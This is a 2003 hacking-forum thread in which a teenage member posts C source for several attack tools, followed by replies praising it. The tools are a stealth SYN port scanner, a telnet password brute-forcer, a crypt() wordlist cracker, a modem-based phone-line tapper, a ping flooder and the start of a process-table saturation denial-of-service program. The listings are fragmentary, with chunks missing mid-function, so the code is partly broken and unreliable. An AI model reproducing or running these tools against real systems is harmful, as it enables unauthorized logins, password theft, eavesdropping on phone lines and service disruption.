Here I am posting most of the security auditing and hacking programs I've ever written, big and small. I wrote them all for Linux, but most of them you can edit to get them working without too much trouble on other platforms.
ALL of them are open source, I hope you find some use for them...
-=Rootscan=- Stealth port scanner.
CODE
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <netinet/in.h> #include <netdb.h> #include <arpa/inet.h> #include <linux/ip.h> #include <linux/tcp.h> #include <sys/socket.h> #include <sys/types.h> #include <pthread.h> struct timeval timeout; #define MAX 1000 #define GREEN "" #define RED "" #define BLUE "" #define TCP_SCAN 1 #define UDP_SCAN 2 #define SYN_SCAN 3 #define NO 0 #define YES 1 /* End of includes and defines */ /* Defining global variables, arrays and functions */ FILE *fp; char file_to_open[60]; int count = 0; int n_threads = 0; int start_port = 1; int end_port = 65535; int parallel = NO; int verbose = NO; int timeout_sec; char *host_addr; struct pseudohdr { unsigned long saddr; unsigned long daddr; char zer0; unsigned char protocol; unsigned short length; }; /* Set prototypes: */ void usage(char progname[]); void tcp_scan(); void udp(); void syn(); void *try_udp_port (void *); void *try_tcp_port(void *); void *try_syn_port(void *); unsigned short in_cksum(unsigned short *addr,int len); /* End of function prototypes */ /* OpenFiles() function, opens scanresults.txt. */ void OpenFiles() { fp = fopen("rootscan.log", "w" ); if( fp == NULL ) { printf(RED "File Open Error\n"); exit(1); } fprintf(fp,"Rootscan was written by shaunige@yahoo.co.uk" ); fprintf(fp,"\nPorted to windows by : Eckz - mrx@netlane.com - http://eckz.cjb.net\n" ); fprintf(fp,"\nOptions added by : InvisibleGhost : i_t_rules@hotmail.com\n" ); fprintf(fp, "Testers/Bug Testers: Threadhead and Odins_Son\n"); fprintf(fp,"\n******************************************************************" ); fprintf(fp,"\n ROOTSCAN LOG "); fprintf(fp,"\n******************************************************************\n" ); } /* End of OpenFiles() function */ /* CloseFiles() function, closes files */ void CloseFiles() { fclose( fp ); } /* End of global variables, arrays and functions */ /* Main function */ int main(int argc, char *argv[]) { char ch; int scan_type; /* Check args, and print a message if wrong */ if(argc < 2) { usage(argv[0]); exit(-1); } /*Set host address*/ host_addr = argv[1]; /* Check command line arguments, and set variables appropriately */ optarg = NULL; timeout_sec = 3; while ((ch = getopt(argc, argv, "sutpvhb:e:c:")) != -1) switch (ch) { case 's': scan_type = SYN_SCAN; break; case 'u': scan_type = UDP_SCAN; break; case 't': scan_type = TCP_SCAN; break; case 'b': start_port = atoi(optarg); break; case 'e': end_port = atoi(optarg); break; case 'p': parallel = YES; break; case 'c': timeout_sec = atoi(optarg); break; case 'v': verbose = YES; break; case 'h': usage(argv[0]); break; default: break; } if (verbose == YES) printf("Scanning host: %s\n", host_addr); if (verbose == YES && parallel == YES) printf("Going into parallel mode.\n"); switch (scan_type) { case TCP_SCAN: tcp_scan(); break; case UDP_SCAN: udp(); break; case SYN_SCAN: syn(); break; default: tcp_scan(); break; } } /* End of main() */ /* UDP scanning function: * This function was a quick hack, and will probably need some editing to work. */ void udp() { if (verbose == YES) printf("Beginning udp scan from: %d to: %d\n", start_port, end_port); if((gethostbyname(host_addr)) == NULL) { printf(RED "Couldn't resolve %s\n", host_addr); exit(-1); } OpenFiles(); for(count = start_port; count <= end_port; count++) { if (parallel == YES) { pthread_t thread_t; pthread_detach(thread_t); n_threads++; if (pthread_create(&thread_t, NULL, try_udp_port, (void *)count)) { count--; n_threads--; } } else { try_udp_port((void *)count); } if (verbose == YES) printf("\rPort: %d\r", count); } CloseFiles(); }
void tcp_scan() { if (verbose == YES) printf("Beginning tcp connect() scan from: %d to: %d\n", start_port, end_port); if((gethostbyname(host_addr)) == NULL) { printf(RED "Couldn't resolve %s\n", host_addr); exit(-1); } printf(BLUE "\t\tPort\t\tState\t\tService\n\n"); /* Start for loop to connect to each port */ OpenFiles();
/* Setting up the sockaddr_in struct with connection details, port, 'family', hostname/IP address */ tcp_dest.sin_family = AF_INET; tcp_dest.sin_port = htons(port); tcp_dest.sin_addr = *((struct in_addr *)tcp_host->h_addr); /* Connecting the sock to the host on the port the for loop is up to */ if (connect(sock , (struct sockaddr *)&tcp_dest, sizeof(struct sockaddr)) == -1) { fprintf( fp ,"Port %5d Closed\n", port); close(sock); } else { /* Get the service name the port is likely to be. */ serv = getservbyport(htons(port), "tcp"); printf(RED "\t\t%d \t\t Open \t\t %s\n", port, (serv == NULL) ? "UNKNOWN" : serv->s_name); fprintf( fp ,"Port %5d Open \t %s\n", port, (serv == NULL) ? "UNKNOWN" : serv->s_name); /* If the variable the for loop is using equals 80, they might be running a web server, get the version? */ if(port == 80) { printf(GREEN "\n\nThe host is running a HTTP server, get HTTPD version? [y/n]"); scanf("%c", &http); if(http == 'y') { fprintf(fp,"\nHTTP version response:\n"); /* Sending HEAD / HTTP/1.0\n\n to get the version. */ send(sock, httpsend, strlen(httpsend), 0); /* Receiving the result, store it in httpbuf */ recv(sock, httpbuf, MAX-1, 0); /* Print it to stdout (monitor) */ printf("%s", httpbuf); /* Print it to the file */ fprintf(fp, "%s", httpbuf); } } /* Close the socket */ close(sock); } }
void *try_syn_port(void *tmp) { int port = (int)(tmp); int sock; struct hostent *h = gethostbyname(host_addr); /* the variables */ int on=1; int ssize = sizeof(struct sockaddr_in); int packet_size = (sizeof(struct tcphdr)+sizeof(struct iphdr)); char *packet = malloc(packet_size); char *received = malloc(packet_size); /* The headers */ struct tcphdr *tcph = (struct tcphdr *)(packet+sizeof(struct iphdr)); struct pseudohdr *pseudo = (struct pseudohdr *)(packet+sizeof(struct iphdr)+sizeof(struct tcphdr)); struct iphdr *iph = (struct iphdr *)(packet); struct tcphdr *tcphr; struct iphdr *iphr;
struct sockaddr_in local; struct sockaddr_in remote; struct in_addr saddr, daddr; struct servent *serv; /* making socket, and telling kernel we fill in the ip header */ if( (sock = socket( PF_INET, SOCK_RAW, IPPROTO_TCP)) < 0 ) { perror("socket"); exit(1); }
else if( tcphr->rst = 1 ) /* RST */ { printf(""); /* anyone a suggestion what could be done here ? */ } else /* This shouldnt happen */ { printf("Protocol violation :P\n"); exit(-2); }
close(sock); }
/* The checksum function from the raw ip faq */ unsigned short in_cksum(unsigned short *addr,int len) { register int sum = 0; u_short answer = 0; register u_short *w = addr; register int nleft = len;
while (nleft > 1) { sum += *w++; nleft -= 2; }
if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w; sum += answer; }
sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); }
void usage(char *progname) { printf(RED "Usage: %s <host/ip> [-tsu] [-p] [-b number] [-e number] [-c number] [-v]\n", progname); printf(RED "\n\nRootscan was written by shaunige@yahoo.co.uk,\nEckz - mrx@netlane.com - http://freewebs.com/bh_x,\n"); printf(RED "InvisibleGhost : i_t_rules@hotmail.com,\nand Ozzy.\nBug testers: Threadhead and Odins_Son, p4n_n0s.\n"); printf(RED "\n\t-u : Scan for UDP Ports\n"); printf(RED "\tUDP scanning option is currently experimental.\n"); printf(RED "\t-s : Scan using SYN scanning (stealthy).\n"); printf(RED "\t-t : Scan using TCP connect() scanning (default).\n"); printf(RED "\t-p : Scan in parallel mode, using threads (faster in some cases)\n"); printf(RED "\t-b number: start scanning at port number. (default = 1)\n"); printf(RED "\t-e number: stop scanning at port number. (default = 65535)\n"); printf(RED "\t-c number: Set connect() timeout (default = 3, \n\tcurrently only affects tcp connect() scan.)\n"); printf(RED "\t-v: Be verbose (mostly for debugging or checking speed)\n\n"); exit(-1); } /* End function */
-=Rootdial=- Minimalistic wardialer.
CODE
#include <stdio.h> #include <string.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> /* May need to change this */ #define MODEM_PORT "/dev/modem" #define GREEN "\E[32m" #define RED "\E[31m" #define BLUE "\E[34m" int main() { int snum; int endnum; unsigned int i; int modemfd; char con_buf[15]; system("clear"); printf(BLUE "--------------------------------------------------------------------------------\n"); printf(RED "\t\tRootdial v3.1 was written by shaunige@yahoo.co.uk\n"); printf(BLUE "--------------------------------------------------------------------------------\n\n"); printf(BLUE "Enter start number: "); scanf("%d", &snum); printf(BLUE "Enter end number: "); scanf("%d", &endnum);
dest.sin_family = AF_INET; dest.sin_port = htons(23); dest.sin_addr = *((struct in_addr *)host->h_addr); fscanf(pwdlist, "%s", pwdbuf); printf("Trying: %s.\n", pwdbuf); if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) == -1) { printf("Couldn't connect to %s on port 23!\n", dhost); exit(-1); } /* I didn't bother checking for a login or password prompt here.*/ send(sock, login, sizeof(pwdbuf), 0); recv(sock, getbuf, sizeof(getbuf), 0); sleep(1); send(sock, pwdbuf, sizeof(pwdbuf), 0); recv(sock, getbuf, sizeof(getbuf), 0); if(strstr(getbuf, prompt) != NULL) { printf("Password is: %s!\n", pwdbuf); fclose(pwdlist); close(sock); return(0); } close(sock); } printf("Password not found!\n"); fclose(pwdlist); return(0); }
-=RootCrack=- Minimalistic UNIX password cracker.
CODE
/* Compile: gcc rootcrack.c -o rootcrack -lcrypt * Usage: ./rootcrack wordlist.txt, then enter the encrypted password string. */
#include <crypt.h> #include <stdio.h> #include <stdlib.h> int main(int argc, char *argv[]) { if(argc < 2) { system("clear"); printf("Usage: rootcrack <wordlist>\n"); printf("Rootcrack was written by shaunige@yahoo.co.uk\n"); exit(-1); }
FILE *wordlist; char salt[3]; char pwd[25]; char wordbuf[10]; char *encrypt; printf("Enter encrypted password: "); // Get the encrypted password. scanf("%s", pwd); if((wordlist = fopen(argv[1], "rw")) == NULL) { // Open the wordlist. printf("Couldn't find wordlist!\n"); exit(-1); }
/* Run through each word in the wordlist, encrypting, and then comparing * it to the encrypted password string. */ while(!feof(wordlist)) { fscanf(wordlist, "%s", wordbuf); salt[0] = pwd[0]; salt[1] = pwd[1]; salt[2] = '\0'; encrypt = (char *) crypt(wordbuf, salt);
/* Check to see if the strings match */ if(strcmp(pwd, encrypt) == 0) { /* We've cracked the password! */ printf("Password is: %s\n", wordbuf); printf("Salt: %s\n", salt); return(0); } } printf("Password not found!\n"); return(0); }
-=RootCrypt-= Simple little XOR encryptor.
CODE
#include <stdio.h> #include <stdlib.h> int main(int argc, char *argv[]) { if(argc < 3) { printf("Usage: %s <infile> <outfile>\n", argv[0]); printf("Rootcrypt was written by shaunige@yahoo.co.uk\n"); exit(-1); }
-=RootTap=- Simple phone tapper. Taps line that modem is connected to.
CODE
#include <stdio.h> #include <string.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> /* May need to change this */ #define MODEM_PORT "/dev/modem" int main() { int modemfd; char modembuf[15]; system("clear"); printf("Roottap was written by shaunige@yahoo.co.uk\n"); printf("Roottap will tap the phone line your modem is connected to\n\n"); if((modemfd = open(MODEM_PORT, O_RDWR | O_NOCTTY | O_NDELAY)) == NULL) { printf("Couldn't open modem\n"); exit(-1); }
printf("Turning modem speaker on...\n"); sprintf(modembuf, "ATM3\r"); sleep(1); write(modemfd, modembuf, 5); printf("Taking the modem off the hook\n"); sprintf(modembuf, "ATH1\r"); sleep(1); write(modemfd, modembuf, 5); printf("Phone line tapped!\n"); sleep(50); }
-=PingFlood=- Simple ping flooder for performance testing of systems, network devices, routers etc...
if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) { printf("Couldn't make socket!\n"); printf("You must be root to create a raw socket.\n"); exit(-1); }
-=PNuke=- A simple program, similiar to Octopus.c in function. A process table saturation attack, if you want to test network performance.
CODE
#include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <netdb.h> #include <netinet/in.h> #define MAX_CON 1025 /* You may have to change this, depending on your OS */ int main(int argc, char *argv[]) { if(argc < 3) { printf("Usage: %s <host
ComSec
Aug 19 2003, 09:02 PM
wow...out of this world....
thats an excellent start to a new forum by 2 good programmers...i can see this forum taking off good style
it would great to see these programs compiled and running in Windows
and how the code was altered to run as an Win app.. just a thought
many thanks guys....
shaun2k2
Aug 19 2003, 09:09 PM
Hehe, thanks.
There's actually not many things you'd need to change on most. You'd need to alter the header files (the ones with #include at the front), and for the socket programs (network programs) you'd need to add a few lines of code to initialise Winsock.
I will post instructions tomorrow, I'm tired, going to bed .
Thank you for your time. Shaun.
Dillinja
Aug 19 2003, 09:28 PM
Amazing!!!
Excellent stuff Shaun! How long you been coding?
ComSec
Aug 19 2003, 09:31 PM
thanks to you shaun2k2 for providing your code for our members to digest
am i glad this forum was created...always wanted my own scanner with a gui and my exploits ....perhaps i might get the chance now
OneNight
Aug 19 2003, 09:44 PM
Very good post Shaun. I think i'll be trying some of these out when i finally get the chance to dual boot linux.
Thx.
w00dy
Aug 20 2003, 04:23 AM
With this new forum and such great content, i spose i better go digging in my code vault and post some too. Great job shaun
If i find time tomorrow nite, i will compile these on freebsd and post them in the file downloads and leave the link here. I just have to find time to write a report for my boss on the Local Loop that he let go to shit. Only about 5000 customers lost phone
PS Going from 3mbit to 56kbit BLOWS!!!!!!!!!
shaun2k2
Aug 20 2003, 02:24 PM
Thanks guys.
dillinja, well, I'm 14 now, so I've been coding since I was 12 or 13, but only around a year seriously. The other time I just messed about with code.
Yeah, it would be really good if we got a whole bunch of our security/hacking programs together, everyone, post yer code .
ComSec, sweet, if you need help I can help with that! My friend wrote a GUI port scanner, I'll get you the code!
www.wxwindows.com
Thank you for your time. Shaun.
ComSec
Aug 20 2003, 09:31 PM
QUOTE
ComSec, sweet, if you need help I can help with that! My friend wrote a GUI port scanner, I'll get you the code!
yeah...look forward to it
QUOTE
I'm 14
your joking ! if you are your going places
shaun2k2
Aug 21 2003, 08:59 PM
Thanks.
Cool, I'm going places .
-Shaun.
andariel
Aug 22 2003, 12:54 PM
QUOTE
I'm 14 now
I feel dumb. lol Nice post shaun, that encouraged me to make my MicroScanner 2.0 open source.
t0bban
Sep 6 2003, 01:05 PM
I admire you shaun I'm a programmer too, but not as experienced it seems, just been playing around with different stuff, made a few chatprogs etc etc. Started with official Microsoft C# courses now too heh.. This encouraged me to pick up the ol' programming books. Hope to see more of your code, as you will see mine when I've done something
Hexboy
Sep 11 2003, 12:57 AM
Nice code ,man . I'm going to create a thread of the one ( 1 ) useful program i've made
.
